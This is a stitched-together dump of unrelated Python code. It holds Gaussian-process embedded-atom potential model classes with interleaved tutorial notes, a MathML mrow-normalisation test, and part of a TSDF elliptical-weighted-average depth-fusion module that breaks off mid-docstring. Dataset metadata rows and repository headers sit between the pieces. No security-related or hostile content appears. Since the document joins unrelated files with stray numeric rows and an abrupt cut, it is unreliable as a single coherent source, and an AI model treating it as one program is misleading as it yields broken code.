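`get_max_eam` scans the training configurations for the most negative value of the EAM-style descriptor, roughly `-(sum_i fcut(r_i) * exp(-(r_i/r0 - 1)))**0.5`; `build_grid` below then uses three times that value as the lower end of its tabulation grid. A pure-Python version of the descriptor for a single configuration, with made-up neighbour distances:

```python
import math

def eam_descriptor(distances, rc, r0):
    # Cosine cutoff times exponential pair term, summed over neighbours;
    # the negative square root matches the kernel's sign convention.
    total = 0.0
    for r in distances:
        cutoff = 0.5 * (1 + math.cos(math.pi * r / rc))
        total += cutoff * math.exp(-(r / r0 - 1))
    return -math.sqrt(total)

# Two neighbours exactly at r0: the pair term is e^0 = 1 and each cutoff is 0.5,
# so the descriptor is -sqrt(0.5 + 0.5) = -1.0.
print(round(eam_descriptor([2.0, 2.0], rc=4.0, r0=2.0), 6))
```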

class EamSingleSpeciesModel(Model):
    """ Eam single species model class
    Class managing the Gaussian process and its mapped counterpart

    Args:
        element (int): The atomic number of the element considered
        r_cut (float): The cutoff radius used to carve the atomic environments
        sigma (float): Lengthscale parameter of the Gaussian process
        theta (float): decay ratio of the cutoff function in the Gaussian Process
        noise (float): noise value associated with the training output data

    Attributes:
        gp (method): The eam single species Gaussian Process
        grid (method): The eam single species tabulated potential
        grid_start (float): Minimum descriptor value for which the grid is defined
        grid_end (float): Maximum descriptor value for which the grid is defined
        grid_num (int): number of points used to create the eam multi grid
    """

    def __init__(self, element, r_cut, sigma, r0, noise, **kwargs):
        super().__init__()
        self.element = element
        self.r_cut = r_cut

        kernel = kernels.EamSingleSpeciesKernel(
            theta=[sigma, r_cut, r0])
        self.gp = gp.GaussianProcess(kernel=kernel, noise=noise, **kwargs)
        self.grid, self.grid_start, self.grid_end, self.grid_num = None, None, None, None
    def fit(self, confs, forces, ncores=1):
        """ Fit the GP to a set of training forces using a
        eam single species force-force kernel

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            forces (array) : Array containing the vector forces on
                the central atoms of the training configurations
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit(confs, forces, ncores=ncores)

    def fit_energy(self, glob_confs, energies, ncores=1):
        """ Fit the GP to a set of training energies using a
        eam single species energy-energy kernel

        Args:
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            energies (array) : Array containing the total energy of each snapshot
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit_energy(glob_confs, energies, ncores=ncores)

    def fit_force_and_energy(self, confs, forces, glob_confs, energies, ncores=1):
        """ Fit the GP to a set of training forces and energies using
        eam single species force-force, energy-force and energy-energy kernels

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            forces (array) : Array containing the vector forces on
                the central atoms of the training configurations
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            energies (array) : Array containing the total energy of each snapshot
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit_force_and_energy(
            confs, forces, glob_confs, energies, ncores=ncores)
    def predict(self, confs, return_std=False, ncores=1):
        """ Predict the forces acting on the central atoms of confs using a GP

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            return_std (bool): if True, returns the standard deviation
                associated to predictions according to the GP framework

        Returns:
            forces (array): array of force vectors predicted by the GP
            forces_errors (array): errors associated to the force predictions,
                returned only if return_std is True
        """
        return self.gp.predict(confs, return_std, ncores=ncores)

    def predict_energy(self, glob_confs, return_std=False, ncores=1):
        """ Predict the global energies of the central atoms of confs using a GP

        Args:
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            return_std (bool): if True, returns the standard deviation
                associated to predictions according to the GP framework

        Returns:
            energies (array) : Array containing the total energy of each snapshot
            energies_errors (array): errors associated to the energies predictions,
                returned only if return_std is True
        """
        return self.gp.predict_energy(glob_confs, return_std, ncores=ncores)

    def save_gp(self, filename):
        """ Saves the GP object, now obsolete
        """
        warnings.warn('use save and load function', DeprecationWarning)
        self.gp.save(filename)

    def load_gp(self, filename):
        """ Loads the GP object, now obsolete
        """
        warnings.warn('use save and load function', DeprecationWarning)
        self.gp.load(filename)
    def build_grid(self, num, ncores=1):
        """ Build the mapped eam potential.
        Calculates the energy predicted by the GP for a configuration whose eam descriptor
        is evaluated between start and end. These energies are stored and a 1D spline
        interpolation is created, which can be used to predict the energy and, through its
        analytic derivative, the force associated to any embedded atom.
        The prediction is done by the ``calculator`` module which is built to work within
        the ase python package.

        Args:
            num (int): number of points to use in the grid of the mapped potential
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        if 'force' in self.gp.fitted:
            self.grid_start = 3.0 * \
                get_max_eam(self.gp.X_train_, self.r_cut,
                            self.gp.kernel.theta[2])
        else:
            self.grid_start = 3.0 * \
                get_max_eam_energy(self.gp.X_glob_train_, self.r_cut,
                                   self.gp.kernel.theta[2])
        self.grid_end = 0
        self.grid_num = num
        dists = list(np.linspace(self.grid_start,
                                 self.grid_end, self.grid_num))
        grid_data = self.gp.predict_energy(dists, ncores=ncores, mapping=True)
        self.grid = interpolation.Spline1D(dists, grid_data)
    def save(self, path):
        """ Save the model.
        This creates a .json file containing the parameters of the model and the
        paths to the GP objects and the mapped potential, which are saved as
        separate .gpy and .gpz files, respectively.

        Args:
            path (str): path to the file
        """
        if not isinstance(path, Path):
            path = Path(path)

        params = {
            'model': self.__class__.__name__,
            'element': self.element,
            'r_cut': self.r_cut,
            'fitted': self.gp.fitted,
            'gp': {
                'kernel': self.gp.kernel.kernel_name,
                'n_train': self.gp.n_train,
                'sigma': self.gp.kernel.theta[0],
                'noise': self.gp.noise,
                'r0': self.gp.kernel.theta[2]
            },
            'grid': {
                'r_min': self.grid_start,
                'r_max': self.grid_end,
                'r_num': self.grid_num,
                'filename': {}
            } if self.grid else {}
        }

        gp_filename = "GP_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npy".format(
            p=params)
        params['gp']['filename'] = gp_filename
        self.gp.save(path / gp_filename)

        if self.grid:
            grid_filename = 'GRID_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npz'.format(
                p=params)
            params['grid']['filename'] = grid_filename
            self.grid.save(path / grid_filename)

        with open(path / 'MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json'.format(p=params), 'w') as fp:
            json.dump(params, fp, indent=4, cls=NpEncoder)

        print("Saved model with name: MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params))
    @classmethod
    def from_json(cls, path):
        """ Load the model.
        Loads the model, the associated GP and the mapped potential, if available.

        Args:
            path (str): path to the .json model file

        Return:
            model (obj): the model object
        """
        if not isinstance(path, Path):
            path = Path(path)
        directory, prefix = path.parent, path.stem

        with open(path) as fp:
            params = json.load(fp)
        # Argument order must match __init__(element, r_cut, sigma, r0, noise);
        # the stored noise and r0 were previously passed in swapped positions.
        model = cls(params['element'],
                    params['r_cut'],
                    params['gp']['sigma'],
                    params['gp']['r0'],
                    params['gp']['noise'])

        gp_filename = params['gp']['filename']
        model.gp.load(directory / gp_filename)

        if params['grid']:
            grid_filename = params['grid']['filename']
            model.grid = interpolation.Spline1D.load(directory / grid_filename)
            model.grid_start = params['grid']['r_min']
            model.grid_end = params['grid']['r_max']
            model.grid_num = params['grid']['r_num']
        return model
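The `save`/`from_json` pair above builds its filenames with `str.format` field indexing into a nested dict: `{p[gp][kernel]}` digs two levels into `params`. A minimal demonstration with made-up values:

```python
# Hypothetical params dict shaped like the one save() builds.
params = {"gp": {"kernel": "eam_ss", "n_train": 100}}

# {p[gp][kernel]} indexes params["gp"]["kernel"] inside the format string.
name = "GP_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npy".format(p=params)
print(name)  # GP_ker_eam_ss_ntr_100.npy
```

Note that inside a format string the keys are written without quotes; `str.format` treats them as string keys automatically.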

class EamManySpeciesModel(Model):
    """ Eam many species model class
    Class managing the Gaussian process and its mapped counterpart

    Args:
        elements (list): The atomic numbers of the elements considered
        r_cut (float): The cutoff radius used to carve the atomic environments
        sigma (float): Lengthscale parameter of the Gaussian process
        r0 (float): radius in the exponent of the eam descriptor
        noise (float): noise value associated with the training output data

    Attributes:
        gp (method): The eam single species Gaussian Process
        grid (method): The eam single species tabulated potential
        grid_start (float): Minimum descriptor value for which the grid is defined
        grid_end (float): Maximum descriptor value for which the grid is defined
        grid_num (int): number of points used to create the eam multi grid
    """

    def __init__(self, elements, r_cut, sigma, r0, noise, **kwargs):
        super().__init__()
        self.elements = list(np.sort(elements))
        self.r_cut = r_cut

        kernel = kernels.EamManySpeciesKernel(
            theta=[sigma, r_cut, r0])
        self.gp = gp.GaussianProcess(kernel=kernel, noise=noise, **kwargs)
        self.grid, self.grid_start, self.grid_end, self.grid_num = {}, None, None, None
    def fit(self, confs, forces, ncores=1):
        """ Fit the GP to a set of training forces using a
        eam single species force-force kernel

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            forces (array) : Array containing the vector forces on
                the central atoms of the training configurations
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit(confs, forces, ncores=ncores)

    def fit_energy(self, glob_confs, energies, ncores=1):
        """ Fit the GP to a set of training energies using a
        eam single species energy-energy kernel

        Args:
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            energies (array) : Array containing the total energy of each snapshot
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit_energy(glob_confs, energies, ncores=ncores)

    def fit_force_and_energy(self, confs, forces, glob_confs, energies, ncores=1):
        """ Fit the GP to a set of training forces and energies using
        eam single species force-force, energy-force and energy-energy kernels

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            forces (array) : Array containing the vector forces on
                the central atoms of the training configurations
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            energies (array) : Array containing the total energy of each snapshot
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        self.gp.fit_force_and_energy(
            confs, forces, glob_confs, energies, ncores=ncores)
    def predict(self, confs, return_std=False, ncores=1):
        """ Predict the forces acting on the central atoms of confs using a GP

        Args:
            confs (list): List of M x 5 arrays containing coordinates and
                atomic numbers of atoms within a cutoff from the central one
            return_std (bool): if True, returns the standard deviation
                associated to predictions according to the GP framework

        Returns:
            forces (array): array of force vectors predicted by the GP
            forces_errors (array): errors associated to the force predictions,
                returned only if return_std is True
        """
        return self.gp.predict(confs, return_std, ncores=ncores)

    def predict_energy(self, glob_confs, return_std=False, ncores=1):
        """ Predict the global energies of the central atoms of confs using a GP

        Args:
            glob_confs (list of lists): List of configurations arranged so that
                grouped configurations belong to the same snapshot
            return_std (bool): if True, returns the standard deviation
                associated to predictions according to the GP framework

        Returns:
            energies (array) : Array containing the total energy of each snapshot
            energies_errors (array): errors associated to the energies predictions,
                returned only if return_std is True
        """
        return self.gp.predict_energy(glob_confs, return_std, ncores=ncores)

    def save_gp(self, filename):
        """ Saves the GP object, now obsolete
        """
        warnings.warn('use save and load function', DeprecationWarning)
        self.gp.save(filename)

    def load_gp(self, filename):
        """ Loads the GP object, now obsolete
        """
        warnings.warn('use save and load function', DeprecationWarning)
        self.gp.load(filename)
    def build_grid(self, num, ncores=1):
        """ Build the mapped eam potential.
        Calculates the energy predicted by the GP for a configuration whose eam descriptor
        is evaluated between start and end. These energies are stored and a 1D spline
        interpolation is created for each element, which can be used to predict the energy
        and, through its analytic derivative, the force associated to any embedded atom.
        The prediction is done by the ``calculator`` module which is built to work within
        the ase python package.

        Args:
            num (int): number of points to use in the grid of the mapped potential
            ncores (int): number of CPUs to use for the gram matrix evaluation
        """
        if 'force' in self.gp.fitted:
            self.grid_start = 3.0 * \
                get_max_eam(self.gp.X_train_, self.r_cut,
                            self.gp.kernel.theta[2])
        else:
            self.grid_start = 3.0 * \
                get_max_eam_energy(self.gp.X_glob_train_, self.r_cut,
                                   self.gp.kernel.theta[2])
        self.grid_end = 0
        self.grid_num = num
        dists = list(np.linspace(self.grid_start,
                                 self.grid_end, self.grid_num))
        for el in self.elements:
            grid_data = self.gp.predict_energy(dists, ncores=ncores, mapping=True, alpha_1_descr=el)
            self.grid[el] = interpolation.Spline1D(dists, grid_data)
    def save(self, path):
        """ Save the model.
        This creates a .json file containing the parameters of the model and the
        paths to the GP objects and the mapped potential, which are saved as
        separate .gpy and .gpz files, respectively.

        Args:
            path (str): path to the file
        """
        if not isinstance(path, Path):
            path = Path(path)

        params = {
            'model': self.__class__.__name__,
            'elements': self.elements,
            'r_cut': self.r_cut,
            'fitted': self.gp.fitted,
            'gp': {
                'kernel': self.gp.kernel.kernel_name,
                'n_train': self.gp.n_train,
                'sigma': self.gp.kernel.theta[0],
                'noise': self.gp.noise,
                'r0': self.gp.kernel.theta[2]
            },
            'grid': {
                'r_min': self.grid_start,
                'r_max': self.grid_end,
                'r_num': self.grid_num,
                'filename': {}
            } if self.grid else {}
        }

        gp_filename = "GP_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npy".format(
            p=params)
        params['gp']['filename'] = gp_filename
        self.gp.save(path / gp_filename)

        for k, grid in self.grid.items():
            key = str(k)
            grid_filename = "GRID_{}_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npz".format(
                key, p=params)
            params['grid']['filename'][key] = grid_filename
            grid.save(path / grid_filename)

        with open(path / "MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params), 'w') as fp:
            json.dump(params, fp, indent=4, cls=NpEncoder)

        print("Saved model with name: MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params))
    @classmethod
    def from_json(cls, path):
        """ Load the model.
        Loads the model, the associated GP and the mapped potential, if available.

        Args:
            path (str): path to the .json model file

        Return:
            model (obj): the model object
        """
        if not isinstance(path, Path):
            path = Path(path)
        directory, prefix = path.parent, path.stem

        with open(path) as fp:
            params = json.load(fp)
        # Argument order must match __init__(elements, r_cut, sigma, r0, noise);
        # the stored noise and r0 were previously passed in swapped positions.
        model = cls(params['elements'],
                    params['r_cut'],
                    params['gp']['sigma'],
                    params['gp']['r0'],
                    params['gp']['noise'])

        gp_filename = params['gp']['filename']
        model.gp.load(directory / gp_filename)

        if params['grid']:
            model.grid_start = params['grid']['r_min']
            model.grid_end = params['grid']['r_max']
            model.grid_num = params['grid']['r_num']
            for key, grid_filename in params['grid']['filename'].items():
                # save() stores keys as str(element); convert back to int so
                # lookups match the integer keys build_grid uses (tuple(key)
                # would instead yield a tuple of characters).
                k = int(key)
                model.grid[k] = interpolation.Spline1D.load(
                    directory / grid_filename)
        return model
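`build_grid` tabulates GP energy predictions at `num` points between `grid_start` and 0 and wraps them in a 1D spline, so later force/energy evaluations never touch the GP again. The tabulate-then-interpolate idea in miniature, with a stand-in energy function and plain linear interpolation instead of the project's `Spline1D`:

```python
def tabulate(f, start, end, num):
    # Sample f at num evenly spaced points from start to end.
    xs = [start + (end - start) * i / (num - 1) for i in range(num)]
    return xs, [f(x) for x in xs]

def interp(xs, ys, x):
    # Simple linear interpolation between tabulated points.
    for i in range(len(xs) - 1):
        x0, x1 = xs[i], xs[i + 1]
        if min(x0, x1) <= x <= max(x0, x1):
            t = (x - x0) / (x1 - x0)
            return ys[i] + t * (ys[i + 1] - ys[i])
    raise ValueError("x outside tabulated range")

xs, ys = tabulate(lambda d: d * d, -3.0, 0.0, 4)  # stand-in for GP energies
print(interp(xs, ys, -1.5))  # halfway between (-2)^2 = 4 and (-1)^2 = 1 -> 2.5
```

The real code uses a cubic spline, which also provides the analytic derivative needed for forces; the linear version is only meant to show the control flow.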
| 37.717153 | 108 | 0.601287 | 2,683 | 20,669 | 4.526277 | 0.105106 | 0.020751 | 0.01087 | 0.018939 | 0.911067 | 0.903327 | 0.891798 | 0.887681 | 0.887681 | 0.881917 | 0 | 0.005773 | 0.312787 | 20,669 | 547 | 109 | 37.786106 | 0.849197 | 0.430645 | 0 | 0.713043 | 0 | 0.008696 | 0.0891 | 0.038351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.030435 | 0 | 0.204348 | 0.008696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
26f981b5f4863b73b97912d52e167354264db414 | 1,363 | py | Python | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | 2 | 2018-01-21T20:06:37.000Z | 2020-05-26T00:11:05.000Z | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | null | null | null | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | null | null | null | from norm_mrow import norm_mrow
if __name__ == '__main__':
dtd = '<!DOCTYPE math SYSTEM "../resources/xhtml-math11-f.dtd">'
n = norm_mrow(dtd)
assert(n.normalize('<math><mrow><mn>3</mn></mrow><mo>+</mo><mrow><mi>i</mi></mrow></math>') == '<math><mn>3</mn><mo>+</mo><mi>i</mi></math>')
assert(n.normalize('<math><msub><mi>x</mi><mrow><mn>2</mn></mrow></msub></math>') == '<math><msub><mi>x</mi><mn>2</mn></msub></math>')
assert(n.normalize('<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi><mo>*</mo><mrow><mi>y</mi></mrow></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
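The `norm_mrow` module itself is not included here. As a hedged illustration of the behavior the assertions above exercise — unwrapping `<mrow>` elements that contain exactly one child while keeping multi-child groups — here is a standard-library sketch (the function name is hypothetical, not the real implementation):

```python
import xml.etree.ElementTree as ET

def unwrap_single_child_mrow(element):
    # Recursively replace any <mrow> wrapping exactly one child with that child;
    # <mrow> groups with two or more children are kept, as the tests above expect.
    for index, child in enumerate(list(element)):
        unwrap_single_child_mrow(child)
        if child.tag == 'mrow' and len(child) == 1:
            element[index] = child[0]
    return element

root = ET.fromstring('<math><msub><mi>x</mi><mrow><mn>2</mn></mrow></msub></math>')
result = ET.tostring(unwrap_single_child_mrow(root), encoding='unicode')
# result: '<math><msub><mi>x</mi><mn>2</mn></msub></math>'
```

Unlike `norm_mrow`, this sketch does not parse against the MathML DTD; it only shows the tree rewrite.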
# ---- File: tsdf/ewa.py (Algomorph/LevelSetFusion-Python, Apache-2.0) ----
# ================================================================
# Created by Gregory Kramida on 1/21/19.
# Copyright (c) 2019 Gregory Kramida
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ================================================================
# EWA = Elliptical Weighted Average, this module provides routines for EWA sampling of the depth image to generate
# a TSDF
import numpy as np
import math
import math_utils.elliptical_gaussians as eg
import tsdf.common as common
# C++ extension, imported under two aliases; both names are used below
import level_set_fusion_optimization as cpp_module
import level_set_fusion_optimization as cpp_extension
near_clipping_distance = 0.05
def find_sampling_bounds_helper(bounds_max, depth_image, voxel_image):
start_x = int(voxel_image[0] - bounds_max[0])
end_x = int(math.ceil(voxel_image[0] + bounds_max[0] + 1))
start_y = int(voxel_image[1] - bounds_max[1])
end_y = int(math.ceil(voxel_image[1] + bounds_max[1] + 1))
if end_y <= 0 or start_y >= depth_image.shape[0] or end_x <= 0 or start_x >= depth_image.shape[1]:
return None
start_y = max(0, start_y)
end_y = min(depth_image.shape[0], end_y)
start_x = max(0, start_x)
end_x = min(depth_image.shape[1], end_x)
return start_x, end_x, start_y, end_y
def find_sampling_bounds_inclusive_helper(bounds_max, depth_image, voxel_image):
start_x = int(voxel_image[0] - bounds_max[0])
end_x = int(math.ceil(voxel_image[0] + bounds_max[0] + 1))
start_y = int(voxel_image[1] - bounds_max[1])
end_y = int(math.ceil(voxel_image[1] + bounds_max[1] + 1))
if end_y <= 0 or start_y >= depth_image.shape[0] or end_x <= 0 or start_x >= depth_image.shape[1]:
return None
return start_x, end_x, start_y, end_y
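To make the difference between the two helpers concrete — the first clamps the box to the image, the "inclusive" variant may return out-of-image indices — here is a self-contained restatement with a worked example (the array sizes and coordinates are made up):

```python
import math
import numpy as np

def find_sampling_bounds(bounds_max, depth_image, voxel_image, clamp=True):
    # Same logic as the helpers above: a conservative pixel bounding box around
    # the projected voxel center, rejected if it misses the image entirely.
    start_x = int(voxel_image[0] - bounds_max[0])
    end_x = int(math.ceil(voxel_image[0] + bounds_max[0] + 1))
    start_y = int(voxel_image[1] - bounds_max[1])
    end_y = int(math.ceil(voxel_image[1] + bounds_max[1] + 1))
    if end_y <= 0 or start_y >= depth_image.shape[0] or end_x <= 0 or start_x >= depth_image.shape[1]:
        return None
    if clamp:  # the "inclusive" variant skips this step
        start_y, end_y = max(0, start_y), min(depth_image.shape[0], end_y)
        start_x, end_x = max(0, start_x), min(depth_image.shape[1], end_x)
    return start_x, end_x, start_y, end_y

depth = np.zeros((480, 640), dtype=np.float32)
# Voxel projecting near the left image border:
print(find_sampling_bounds(np.array([2.0, 2.0]), depth, np.array([1.0, 100.0])))
# -> (0, 4, 98, 103); the inclusive variant would give (-1, 4, 98, 103)
```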
def generate_tsdf_3d_ewa_image(depth_image, camera,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_shape=np.array([128, 128, 128]), default_value=1,
voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 3D TSDF field based on elliptical Gaussian averages (EWA) of depth values from the provided image.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
    with a circular 2D Gaussian filter before averaging the depth values.
:type depth_image: np.ndarray
:param depth_image: depth image to use
:type camera: calib.camera.DepthCamera
:param camera: camera used to generate the depth image
:param voxel_size: voxel size, in meters
:param array_offset: offset of the TSDF grid from the world origin
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param default_value: default initial TSDF value
:param field_shape: shape of the TSDF grid to generate
:param narrow_band_width_voxels: span (in voxels) where signed distance is between -1 and 1
:param back_cutoff_voxels: where to truncate the negative voxel values (currently not supported!)
:param gaussian_covariance_scale: scale of elliptical gaussians (relative to voxel size)
:return: resulting 3D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit on
# "if signed_distance < -narrow_band_half_width" (maybe?)
if default_value == 1:
field = np.ones(field_shape, dtype=np.float32)
elif default_value == 0:
field = np.zeros(field_shape, dtype=np.float32)
else:
field = np.ndarray(field_shape, dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera.intrinsics.intrinsic_matrix[0:2, 0:2]
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for z_field in range(field_shape[2]):
for y_field in range(field_shape[1]):
for x_field in range(field_shape[0]):
# coordinates deliberately flipped here to maintain consistency between Python & C++ implementations
# Eigen Tensors being used are column-major, whereas here we use row-major layout by default
x_voxel = (z_field + array_offset[0]) * voxel_size
y_voxel = (y_field + array_offset[1]) * voxel_size
z_voxel = (x_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel center
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
inv_z_cam = 1 / voxel_camera[2]
projection_jacobian = \
np.array([[inv_z_cam, 0, -voxel_camera[0] / z_cam_squared],
[0, inv_z_cam, -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
                depth_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
depth_sum += weight * surface_depth
weights_sum += weight
if depth_sum <= 0.0:
continue
final_depth = depth_sum / weights_sum
signed_distance = final_depth - voxel_camera[2]
field[z_field, y_field, x_field] = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
return field
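`common.compute_tsdf_value` is defined elsewhere in the package. Assuming the conventional truncation rule, which is what the narrow-band docstring above describes, it behaves roughly like the following sketch (the `_sketch` suffix marks it as an assumption, not the real implementation):

```python
def compute_tsdf_value_sketch(signed_distance, narrow_band_half_width):
    # Scale the metric signed distance into the narrow band and truncate to [-1, 1].
    if signed_distance > narrow_band_half_width:
        return 1.0
    if signed_distance < -narrow_band_half_width:
        return -1.0
    return signed_distance / narrow_band_half_width

# With a 20-voxel band at 4 mm voxels, narrow_band_half_width = 20 / 2 * 0.004 = 0.04 m:
print(compute_tsdf_value_sketch(0.02, 0.04))   # -> 0.5  (inside the band, in front of the surface)
print(compute_tsdf_value_sketch(-0.10, 0.04))  # -> -1.0 (truncated, behind the surface)
```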
# Mostly for debugging EWA -- compute matrix containing sampling areas for each field entry being considered
def sampling_area_heatmap_2d_ewa_image(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64], dtype=np.int32),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
    if not isinstance(array_offset, np.ndarray):
        array_offset = np.array(array_offset).astype(np.int32)
return cpp_extension.sampling_area_heatmap_2d_ewa_image(image_y_coordinate,
depth_image,
camera.depth_unit_ratio,
camera.intrinsics.intrinsic_matrix.astype(
np.float32),
camera_extrinsic_matrix.astype(np.float32),
array_offset.astype(np.int32),
field_size,
voxel_size,
narrow_band_width_voxels,
gaussian_covariance_scale)
def generate_tsdf_3d_ewa_image_visualization_cpp(depth_image, camera, field,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
voxel_size=0.004,
array_offset=np.array([-64, -64, 64], dtype=np.int32), scale=20,
gaussian_covariance_scale=1.0):
    if not isinstance(array_offset, np.ndarray):
        array_offset = np.array(array_offset).astype(np.int32)
return cpp_extension.generate_tsdf_3d_ewa_image_visualization(depth_image,
camera.depth_unit_ratio,
field,
camera.intrinsics.intrinsic_matrix.astype(
np.float32),
camera_extrinsic_matrix.astype(np.float32),
array_offset,
voxel_size,
scale,
0.1,
gaussian_covariance_scale)
def generate_tsdf_2d_ewa_image(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of depth values from the provided image.
